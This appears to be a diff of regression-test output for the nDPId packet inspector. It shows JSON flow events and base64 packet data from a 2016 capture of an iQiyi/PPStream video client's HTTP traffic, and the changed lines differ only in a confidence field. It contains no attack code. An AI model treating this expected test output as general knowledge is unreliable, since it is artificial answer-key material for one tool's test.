02136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1995,"source":"pps.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":1,"flow_last_seen":1467353197951,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353197951,"pkt":"TF4M6gNlABxCjnAxCABFAAUUM2tAAIAGCK3AqHMIb84WTcZbAFDJCjAgTd\/tYVAQAQRxYwAAR0VUIC9iP3BmPTIwMSZwPTExJnAxPTExNCZhcD0wJnNvdXJjZTE9bGlzdCZzb3VyY2UyPW9ubGluZV9sJnQ9MjAxJmN0PWNsdF9fcGxfcGxheSZhbGJ1bV9pZD0xODA5MzIzMDEmYzE9NDc5NTMxMDAwJmNsdD1ob21lZGwmY249MTYwNTA1LSVFNiVBRCVBMyVFNyU4OSU4NyVFRiVCQyU5QSVFOSU4MyU5MSVFNiU4MSVCQSVFNiVBQyVBNyVFNSVCNyVCNCVFNCVCQSU4QyVFNiVBQyVBMSVFNSVCRCU5MiVFNiU5RCVBNSVFNSU4RiU4RCVFOSU4MCU4NiVFOCVBMiVBRC0lRTQlQkIlOEElRTYlOTklOUE4MCVFNSU5MCU4RSVFOCU4NCVCMSVFNSU4RiVBMyVFNyVBNyU4MCZjcHV1c2U9MTQuMSZkZT0zMmU2NTRmYTU3YmU5MGVjNjM4YzQ2ZGRmZGQ2Njc1NyZkbGx2PWFwcHYlM0Q1LjAuMC4xMDAzJTdDb2x2JTNENS4wLjAuMTEwMSZldD0wJmZ0PTIxNzUmaHQ9MCZodT0tMSZpc2RtPTAmaXNsb2NhbD0wJmt2PTEwLjAuMC4yOTMmbGFuZz0mbWVtcGh5PTY3Jm1lbXZpcj0xMjEmbXQ9MCZtdj01LjIuMTUuMjI0MCZwMj0xMDExJnBlPSZwb3B0PTAmcHQ9MiZwdHlwZT0xJnB1PSZyPTQ3OTUzMTAwMCZyX2lkPTQ3OTUzMTAwMCZyYT0xJnJuPTIzOTg3JnNjaG5faWQ9MjAwMDAzNzE5JTI0JTI0JTI0JTI0MTgwOTMyMzAxJnNjaG5fbmFtZT0lRTclQkIlQkMlRTglODklQkElRTUlQTglQjElRTQlQjklOTAlMjQlMjQlMjQlMjQlRTQlQkIlOEElRTYlOTklOUE4MCVFNSU5MCU4RSVFOCU4NCVCMSVFNSU4RiVBMyVFNyVBNyU4MCZzcHQ9MTQ2NzM1MzE5NyZzdGltZT0wJnR2aWQ9NDc5NTMxMDAwJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mdXBsb2FkX2lkPSZ1cmw9aHR0cCUzQSUyRiUyRnd3dy5pcWl5aS5jb20lMkZ2XzE5cnJsdnV4bGcuaHRtbCZ2PTIuMC4xMDIuMzAxNDcmdmU9MzMzODI1Y2RmNDg2Y2M5NGI2ZDI5NTZmNGRlNmQ0Y2ImdmlkPTJiOTQ3MjllM2E5MjBiMjExOTg4NmM1YzY3N2FlOWRiJm1zZz1NWHcwZkFkUUFGSURVZ0ZSU0FCNmR3TmtCUUptZlhWM2RubGhZbmxJQlhUVnh5NGFPTDBBZEM2UVdSYURTS0IxY29kZGkxT3J0aUF6TmYzSDhwZUN2MUwlMkZSMiUyQjZUWUZEVXptSXA5b29TJTJGc3FRME50aEpLVDNBSHRDSkg2SmFLSGQxS2RwTDZwRVJ5bTBKM0FOUWxWUzluQWx3bGw2ciUyQjNMVzlpbXVHd2ZoNCUzRCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUWl5aSBMaXN0IENsaWVudCBQQyA1LjIuMTUuMjI0MA0KSG9zdDogbXNnLmlxaXlpLmNvbQ0KQWNjZXB0LUVuY29kaW5nOiBnemlwDQpQcmFnbWE6"} -01934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1995,"source":"pps.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353197951,"flow_last_seen":1467353197951,"flow_idle_time":7580000,"flow_min_l4_payload_len":1260,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":1260,"midstream":1,"thread_ts_msec":1467353197951,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50779,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"msg.iqiyi.com","url":"msg.iqiyi.com\/b?pf=201&p=11&p1=114&ap=0&source1=list&source2=online_l&t=201&ct=clt__pl_play&album_id=180932301&c1=479531000&clt=homedl&cn=160505-%E6%AD%A3%E7%89%87%EF%BC%9A%E9%83%91%E6%81%BA%E6%AC%A7%E5%B7%B4%E4%BA%8C%E6%AC%A1%E5%BD%92%E6%9D%A5%E5%8F%8D%E9%80%86%E8%A2%AD-%E4%BB%8A%E6%99%9A80%E5%90%8E%E8%84%B1%E5%8F%A3%E7%A7%80&cpuuse=14.1&de=32e654fa57be90ec638c46ddfdd66757&dllv=appv%3D5.0.0.1003%7Colv%3D5.0.0.1101&et=0&ft=2175&ht=0&hu=-1&isdm=0&islocal=0&kv=10.0.0.293&lang=&memphy=67&memvir=121&mt=0&mv=5.2.15.2240&p2=1011&pe=&popt=0&pt=2&ptype=1&pu=&r=479531000&r_id=479531000&ra=1&rn=23987&schn_id=200003719%24%24%24%24180932301&schn_name=%E7%BB%BC%E8%89%BA%E5%A8%B1%E4%B9%90%24%24%24%24%E4%BB%8A%E6%99%9A80%E5%90%8E%E8%84%B1%E5%8F%A3%E7%A7%80&spt=1467353197&stime=0&tvid=479531000&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&upload_id=&url=http%3A%2F%2Fwww.iqiyi.com%2Fv_19rrlvuxlg.html&v=2.0.102.30147&ve=333825cdf486cc94b6d2956f4de6d4cb&vid=2b94729e3a920b2119886c5c677ae9db&msg=MXw0fAdQAFIDUgFRSAB6dwNkBQJmfXV3dnlhYnlIBXTVxy4aOL0AdC6QWRaDSKB1coddi1OrtiAzNf3H8peCv1L%2FR2%2B6TYFDUzmIp9ooS%2FsqQ0NthJKT3AHtCJH6JaKHd1KdpL6pERym0J3ANQlVS9nAlwll6r%2B3LW9imuGwfh4%3D","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} +01934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1995,"source":"pps.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353197951,"flow_last_seen":1467353197951,"flow_idle_time":7580000,"flow_min_l4_payload_len":1260,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":1260,"midstream":1,"thread_ts_msec":1467353197951,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50779,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"msg.iqiyi.com","url":"msg.iqiyi.com\/b?pf=201&p=11&p1=114&ap=0&source1=list&source2=online_l&t=201&ct=clt__pl_play&album_id=180932301&c1=479531000&clt=homedl&cn=160505-%E6%AD%A3%E7%89%87%EF%BC%9A%E9%83%91%E6%81%BA%E6%AC%A7%E5%B7%B4%E4%BA%8C%E6%AC%A1%E5%BD%92%E6%9D%A5%E5%8F%8D%E9%80%86%E8%A2%AD-%E4%BB%8A%E6%99%9A80%E5%90%8E%E8%84%B1%E5%8F%A3%E7%A7%80&cpuuse=14.1&de=32e654fa57be90ec638c46ddfdd66757&dllv=appv%3D5.0.0.1003%7Colv%3D5.0.0.1101&et=0&ft=2175&ht=0&hu=-1&isdm=0&islocal=0&kv=10.0.0.293&lang=&memphy=67&memvir=121&mt=0&mv=5.2.15.2240&p2=1011&pe=&popt=0&pt=2&ptype=1&pu=&r=479531000&r_id=479531000&ra=1&rn=23987&schn_id=200003719%24%24%24%24180932301&schn_name=%E7%BB%BC%E8%89%BA%E5%A8%B1%E4%B9%90%24%24%24%24%E4%BB%8A%E6%99%9A80%E5%90%8E%E8%84%B1%E5%8F%A3%E7%A7%80&spt=1467353197&stime=0&tvid=479531000&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&upload_id=&url=http%3A%2F%2Fwww.iqiyi.com%2Fv_19rrlvuxlg.html&v=2.0.102.30147&ve=333825cdf486cc94b6d2956f4de6d4cb&vid=2b94729e3a920b2119886c5c677ae9db&msg=MXw0fAdQAFIDUgFRSAB6dwNkBQJmfXV3dnlhYnlIBXTVxy4aOL0AdC6QWRaDSKB1coddi1OrtiAzNf3H8peCv1L%2FR2%2B6TYFDUzmIp9ooS%2FsqQ0NthJKT3AHtCJH6JaKHd1KdpL6pERym0J3ANQlVS9nAlwll6r%2B3LW9imuGwfh4%3D","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} 00548{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1996,"source":"pps.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":2,"flow_last_seen":1467353197951,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":124,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":124,"pkt_l4_len":90,"thread_ts_msec":1467353197951,"pkt":"TF4M6gNlABxCjnAxCABFAABuM2xAAIAGDVLAqHMIb84WTcZbAFDJCjUMTd\/tYVAYAQQaAAAAIG5vLWNhY2hlDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KQ29ubmVjdGlvbjogY2xvc2UNCkFjY2VwdDogKi8qDQoNCg=="} 00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1997,"source":"pps.pcap","alias":"nDPId-test","flow_id":104,"flow_packet_id":3,"flow_last_seen":1467353198052,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":194,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":194,"pkt_l4_len":160,"thread_ts_msec":1467353198052,"pkt":"ABxCjnAxTF4M6gNlCABFAAC0gHZAADMGDQJvzhZNwKhzCABQxltN3+1hyQo1UlAYACMO1AAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOC4wDQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA2OjM3IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbnRlbnQtTGVuZ3RoOiAwDQpDb25uZWN0aW9uOiBjbG9zZQ0KDQo="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1998,"source":"pps.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353198532,"flow_last_seen":1467353198532,"flow_idle_time":7580000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":249,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":249,"midstream":1,"thread_ts_msec":1467353198532,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50780,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00786{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1998,"source":"pps.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":1,"flow_last_seen":1467353198532,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":303,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":303,"pkt_l4_len":269,"thread_ts_msec":1467353198532,"pkt":"TF4M6gNlABxCjnAxCABFAAEhM5pAAIAGSV3AqHMI3xpqFMZcAFDCryK2CgBK\/VAYAQQ7tAAAR0VUIC9wcmVpbWFnZS8yMDE2MDUwNi9mMC8xZi92XzExMDM1OTk5OF9tXzYxMV8xNjBfOTBfMi5qcGc\/bm89MiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUWl5aSBMaXN0IENsaWVudCBQQyA1LjIuMTUuMjI0MA0KSG9zdDogcHJlaW1hZ2UxLnFpeWlwaWMuY29tDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClByYWdtYTogbm8tY2FjaGUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBjbG9zZQ0KQWNjZXB0OiAqLyoNCg0K"} -00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1998,"source":"pps.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353198532,"flow_last_seen":1467353198532,"flow_idle_time":7580000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":249,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":249,"midstream":1,"thread_ts_msec":1467353198532,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50780,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"preimage1.qiyipic.com","url":"preimage1.qiyipic.com\/preimage\/20160506\/f0\/1f\/v_110359998_m_611_160_90_2.jpg?no=2","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} +00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1998,"source":"pps.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353198532,"flow_last_seen":1467353198532,"flow_idle_time":7580000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":249,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":249,"midstream":1,"thread_ts_msec":1467353198532,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50780,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"preimage1.qiyipic.com","url":"preimage1.qiyipic.com\/preimage\/20160506\/f0\/1f\/v_110359998_m_611_160_90_2.jpg?no=2","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} 02166{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1999,"source":"pps.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":2,"flow_last_seen":1467353198595,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353198595,"pkt":"ABxCjnAxTF4M6gNlCABFAAUUAJVAADgGwG\/fGmoUwKhzCABQxlwKAEr9wq8jr1AQAB\/+YwAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFFXUw0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjozOCBHTVQNCkNvbnRlbnQtVHlwZTogaW1hZ2UvanBlZw0KQ29udGVudC1MZW5ndGg6IDY4MDQ1Mw0KQ29ubmVjdGlvbjogY2xvc2UNCkV4cGlyZXM6IEZyaSwgMDUgTWF5IDIwMTcgMTc6MzU6NTYgR01UDQpDYWNoZS1Db250cm9sOiBtYXgtYWdlPTMxNTM2MDAwDQpBY2NlcHQtUmFuZ2VzOiBieXRlcw0KTGFzdC1Nb2RpZmllZDogVGh1LCAwNSBNYXkgMjAxNiAxNjoyMzo1NSBHTVQNClgtQ2FjaGU6IGZyb20gMTI3LjAuMC4xDQpBZ2U6IDQ4ODM0NDINClZpYTogaHR0cC8xLjEgUVRTIChRVFMgW2NIcyBmIF0pDQpYLUNhY2hlOiBmcm9tIDEwLjIyMS4zMi4yMTYNClgtQ2FjaGU6IE1JU1MgZnJvbSAyMjMuMjYuMTA2LjIwDQoNCv\/Y\/+AAEEpGSUYAAQEAAAEAAQAA\/9sAQwADAgIDAgIDAwMDBAMDBAUIBQUEBAUKBwcGCAwKDAwLCgsLDQ4SEA0OEQ4LCxAWEBETFBUVFQwPFxgWFBgSFBUU\/9sAQwEDBAQFBAUJBQUJFA0LDRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU\/\/4AC3FpeWkxLjAuM\/\/AABEIA4QGQAMBIgACEQEDEQH\/xAAeAAACAwADAQEBAAAAAAAAAAAGBwQFCAIDCQABCv\/EAG8QAAEDAwMCBAMEBAgGDQUCHwECAwQFBhEAEiEHMQgTIkEUUWEVMnGBI0KRoQkWJFJyscHRJTNigsPwFyY0Q3OSssLE0tTh8TVThqKz0xg2RGODhIWTo6S0J1RkdHWURnYZN0VVVmVmlZbF4tUp\/8QAHQEAAgMBAQEBAQAAAAAAAAAABQYDBAcCAQgACf\/EAEcRAAIBAwMBBgMGAwcEAQMCBwECAwAEEQUSITEGEyJBUWEUcYEjMpGhsdEVweEHJDNCUmLwFiVy8SY0Q1NzNYKyosJjg9L\/2gAMAwEAAhEDEQA\/APMptJVH130SjzK1ODEJhT7nfaPYfU\/36sLbZpa5kcVlcxmmZPnLp7aFPYwcbQogZzjufnpudML6tTppWVy7NuK4oNWd+7OqUFmN5GAcbVNvOHnPOQB9dazqvexW8bxLlgK902GK6uRDM20HzpX9Quk14dJ6+mm3hbs635Lw8xn4xrah5PHqbX91wcpyUk9+dVO39FrVXio8T1teJOo0iFdEycw1Qk4p82j0xuVIUFNoS8h5S32knctsODaDjdjSXTR+mhR\/8EV3\/wCdb0Q\/9O132ZlLRu0gOSfSoNQiW2mMQOflzSwqSfu64U5Pq0xp1E6YHG+6LuT\/AOjUX\/t+umJROmSVei6rsV+Nsxv+36hlUfxbf5VSDjZ0oKmp\/Qq120RP8lV+OjiVR+nKm1brouhH\/ozGP\/T9fU2j9O0x1eXdVzrTnv8AxYj8f\/R+j\/fKmqCTB+6fKoi+UxQFTU+pz8TqJKZP2n+f9+mRBo\/Tncry7suVfJ\/\/AAYYH\/T9R36H02+L3Ku250q+"} 02175{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2000,"source":"pps.pcap","alias":"nDPId-test","flow_id":105,"flow_packet_id":3,"flow_last_seen":1467353198595,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353198595,"pkt":"ABxCjnAxTF4M6gNlCABFAAUUAJZAADgGwG7fGmoUwKhzCABQxlwKAE\/pwq8jr1AQAB8TPwAAQtiP\/X8fofczLJZRL\/v\/AJ10rgMaH2Gf0Z1VVRnTPjUywEtnbclzqH\/4txv+36rp9H6bKz5tz3WP6Nsxj\/0\/TXrE0cmn7QD09DVaNjvoBpjfp1znU2VIcOxhxTO3cpxDZUEjnvgfQ9\/kdMGm0bpqlI2XLdrn\/o5FH\/T9HQ6yUG2uklRsGHVriXDly3XBJfo0UFplaUZbSBKJGVpWo+rH6Q8ZJ0lao8w0NVtwc5GeOMfOiVqYmnxKcCg6odBbrtWm0V+ox2Gm6o0XGFCU2spISpRQ4kEqaWEDdtWEn8+Nc5fQi6E7EFMNCluIaAMtGQpRwnPJ4ORydHnUzrNSes\/2KupyKzGZp0NDO+PSY6nZDqRtLrizKHcfvJ1Uzn6DNoUaGmnXP5aWkJakx7dYSp1KVbgorEkhWT3Iz31Qgve0ENiqumF8sjyo+kejk5Lkmq1fhC6hU9DqlM0xzccFLc9ClcKAPGP8odtLOv2vPs6vzKPUUoTMiq2u+UrekH6Ht+zTeVVqHU0T0NWpcm6WzjezbzSVoHqTvQQ7nPqwT+3Vr0XtGkXqK5FtuDc9TktNIVML8unxEoQd4QEl1RGSQc89wNRaRfTWzCa7P2a+f1qneLaFMW2S1Z3nt418lHoT+Gtf0\/wxVG94D1sU62a09IhOtMeWu5qQlYdU0h0cc7glDyCvafzJ1lao0ldLnTYT6C29FecYcRuC9qkKKVDI4OCDyANaFpeo2mrXEq27ZIFBGR41BcYodQCY6tSKJSJlZnCPBjqfe+8Up9h+P9+rC3GqUufH+2lzG6Zk+caelCnsYONoUQO+O5+em50yvu0umdZVMs64rip1Wd5TOqMNmP5GAcbVNuuHnPO4AfXSjqxlggSSJcsBRTTYYrq5EMzbQfOlb1E6TXh0kryKbeFuz7flPArZ+MaKUPp49Ta\/uuD1J5ST351UJb9OtW+KrxO2z4lKjR4d0TZzTVCTtp02jU5qTIUFtoS8l5a32knctsLG1JxuxnSURR+mpSn\/AA\/d6f8A5QxD\/wBN1x2ZlLJIzqck+lQ6hCLeXuwQcenNLCop241wgJ3uaZU2i9MDjfct3J\/9HIh\/6frpi0bpilz0XPdh\/G2ov\/b9cygfxbd5VSD+DFA0xH6PUijJ\/krn46NplG6cKbO66LpH4WzGP\/T9cqZSOnaWHPKue6Fc\/wD7Mxh\/0\/R8TKmqB8H7p8jUJbKYoCpbf6RzPz\/t1Ekt\/wCESPqNMaDRunO9zy7nuhfz\/wBrMf8A7frpfofTb4w7rqugOZ7fxZjH9\/x+hlzMr2US\/wC\/+ddK\/iPFDjDPp1VVNs86aLFM6fBO1Nx3Qf8A0cjf9v1XzaN02P8Ajbmuwf0bai\/9v026vPFLp+1c9PQ1DGWDcil9SmztPOu6bTZMhYUhhxTIG5TiW1KCRz3wD\/qNHtOpHTNI\/RXDdzv\/AKOxU\/8ATjo5HWShW10lqVgw6ncTkOXLecTJk0mNlthaEZbAEknJWlajzj1n3J0l6o8x0RVtwc5GeOMfOiFr3bT4mOBQhUOgl1WpTaK\/UY0dpuqtFxgolNrUkhKlFDiAoqaVtGcLA\/brnK6FXQnCFIhoUtxLQCpSM7lHCQRk98jv20ddTes1M60fYqqm9WIrNOhts741LjqdkOgbS64syR3H7yc6qZ0mhzKDFi\/ZdylkMIQ1"} 00747{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2456,"source":"pps.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":2,"flow_last_seen":1467353199417,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1467353199417,"pkt":"ABxCjnAxTF4M6gNlCABFAAEF4D5AADEGSkB7fW9GwKhzCABQxlcB794psg4Z21AYPLiOgAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFRlbmdpbmUNCkRhdGU6IEZyaSwgMDEgSnVsIDIwMTYgMDY6MDY6MzggR01UDQpDb250ZW50LVR5cGU6IHRleHQvcGxhaW47Y2hhcnNldD1VVEYtOA0KQ29udGVudC1MZW5ndGg6IDI5DQpDb25uZWN0aW9uOiBjbG9zZQ0KQWNjZXNzLUNvbnRyb2wtQWxsb3ctQ3JlZGVudGlhbHM6IHRydWUNCg0KeyJkYXRhIjp0cnVlLCJjb2RlIjoiQTAwMDAwIn0="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2545,"source":"pps.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353200271,"flow_last_seen":1467353200271,"flow_idle_time":7580000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":249,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":249,"midstream":1,"thread_ts_msec":1467353200271,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50781,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00785{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2545,"source":"pps.pcap","alias":"nDPId-test","flow_id":106,"flow_packet_id":1,"flow_last_seen":1467353200271,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":303,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":303,"pkt_l4_len":269,"thread_ts_msec":1467353200271,"pkt":"TF4M6gNlABxCjnAxCABFAAEhNFdAAIAGSKDAqHMI3xpqFMZdAFCAFVM2Sak8SVAYAQQb1wAAR0VUIC9wcmVpbWFnZS8yMDE2MDUwNi9mMC8xZi92XzExMDM1OTk5OF9tXzYxMV8xNjBfOTBfMy5qcGc\/bm89MyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogUWl5aSBMaXN0IENsaWVudCBQQyA1LjIuMTUuMjI0MA0KSG9zdDogcHJlaW1hZ2UxLnFpeWlwaWMuY29tDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXANClByYWdtYTogbm8tY2FjaGUNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQpDb25uZWN0aW9uOiBjbG9zZQ0KQWNjZXB0OiAqLyoNCg0K"} -00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2545,"source":"pps.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353200271,"flow_last_seen":1467353200271,"flow_idle_time":7580000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":249,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":249,"midstream":1,"thread_ts_msec":1467353200271,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50781,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"preimage1.qiyipic.com","url":"preimage1.qiyipic.com\/preimage\/20160506\/f0\/1f\/v_110359998_m_611_160_90_3.jpg?no=3","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} +00861{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2545,"source":"pps.pcap","alias":"nDPId-test","flow_id":106,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353200271,"flow_last_seen":1467353200271,"flow_idle_time":7580000,"flow_min_l4_payload_len":249,"flow_max_l4_payload_len":249,"flow_tot_l4_payload_len":249,"flow_avg_l4_payload_len":249,"midstream":1,"thread_ts_msec":1467353200271,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50781,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"},"http": {"hostname":"preimage1.qiyipic.com","url":"preimage1.qiyipic.com\/preimage\/20160506\/f0\/1f\/v_110359998_m_611_160_90_3.jpg?no=3","code":0,"content_type":"","user_agent":"Qiyi List Client PC 5.2.15.2240"}} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2550,"source":"pps.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353202192,"flow_last_seen":1467353202192,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1467353202192,"l3_proto":"ip4","src_ip":"77.234.41.35","dst_ip":"192.168.115.8","src_port":80,"dst_port":49174,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2550,"source":"pps.pcap","alias":"nDPId-test","flow_id":107,"flow_packet_id":1,"flow_last_seen":1467353202192,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1467353202192,"pkt":"ABxCjnAxTF4M6gNlCABFKADCuCpAADIG5SVN6ikjwKhzCABQwBY\/zyZ9xn1A6VAYAAIAJQAASFRUUC8xLjEgMjAwIE9LDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbQ0KUHJhZ21hOiBuby1jYWNoZQ0KQ2FjaGUtY29udHJvbDogbm8tY2FjaGUNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNClRyYW5zZmVyLUVuY29kaW5nOiBjaHVua2VkDQoNCg=="} -00778{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2550,"source":"pps.pcap","alias":"nDPId-test","flow_id":107,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353202192,"flow_last_seen":1467353202192,"flow_idle_time":7580000,"flow_min_l4_payload_len":154,"flow_max_l4_payload_len":154,"flow_tot_l4_payload_len":154,"flow_avg_l4_payload_len":154,"midstream":1,"thread_ts_msec":1467353202192,"l3_proto":"ip4","src_ip":"77.234.41.35","dst_ip":"192.168.115.8","src_port":80,"dst_port":49174,"l4_proto":"tcp","ndpi": {"flow_risk": {"4": {"risk":"Binary App Transfer","severity":"Severe","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Download"},"http": {}} 